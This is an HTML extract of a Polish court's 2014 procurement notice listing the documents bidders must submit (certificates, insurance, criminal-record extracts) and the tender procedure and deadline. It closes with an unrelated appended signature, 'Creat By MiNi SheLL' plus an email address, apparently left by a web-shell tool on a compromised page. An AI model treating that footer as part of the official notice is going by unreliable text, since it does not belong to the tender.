<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Opłacona polisa ubezpieczenia wartości pieniężnych w transporcie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nowytarg.sr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 34-400 Nowy Targ ul. Ludźmierska 29..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.10.2014 godzina 10:00, miejsce: w siedzibie zamawiającego, tj: Nowy Targ ul. Ludźmierska 29 - pok. 009 (parter, II budynek Sądu).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com